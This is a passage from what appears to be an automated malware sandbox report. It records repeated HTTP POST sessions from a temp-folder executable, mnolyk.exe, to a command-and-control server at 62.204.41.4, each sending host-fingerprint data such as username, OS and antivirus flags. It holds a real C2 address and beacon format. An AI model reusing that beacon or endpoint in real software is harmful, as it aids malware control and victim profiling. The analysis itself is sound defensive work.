                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:51.730381012 CET558INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          411192.168.2.65013562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:51.914333105 CET559OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:51.976408958 CET559INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          412192.168.2.65013662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:52.154927969 CET560OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:52.219247103 CET560INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          413192.168.2.65013762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:52.411571980 CET561OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:52.481930971 CET561INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          414192.168.2.65013862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:52.674592018 CET562OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:52.740448952 CET562INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          415192.168.2.65013962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:52.924797058 CET563OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:52.988130093 CET563INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          416192.168.2.65014062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:53.167783022 CET564OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:53.232999086 CET564INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          417192.168.2.65014162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:53.400943041 CET565OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:53.464102983 CET565INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          418192.168.2.65014262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:53.636956930 CET566OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:53.700922966 CET566INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          419192.168.2.65014362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:53.873531103 CET567OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:53.937649012 CET567INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          42192.168.2.64976162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:01.073822021 CET149OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:01.139965057 CET155INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          420192.168.2.65014462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:54.112123966 CET568OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:54.178194046 CET568INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          421192.168.2.65014562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:54.357855082 CET569OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:54.420859098 CET569INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          422192.168.2.65014662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:54.625344038 CET570OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:54.691339016 CET570INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          423192.168.2.65014762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:54.873680115 CET571OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:54.939722061 CET571INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          424192.168.2.65014862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:55.124322891 CET572OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:55.191257000 CET572INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          425192.168.2.65014962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:55.389817953 CET573OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:55.454595089 CET573INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          426192.168.2.65015062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:55.620345116 CET574OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:55.682312965 CET574INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          427192.168.2.65015162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:55.858237982 CET575OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:55.921014071 CET575INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          428192.168.2.65015262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:56.096465111 CET576OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:56.160877943 CET576INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          429192.168.2.65015362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:56.341247082 CET577OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:56.404689074 CET577INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          43192.168.2.64976262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:01.308697939 CET156OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
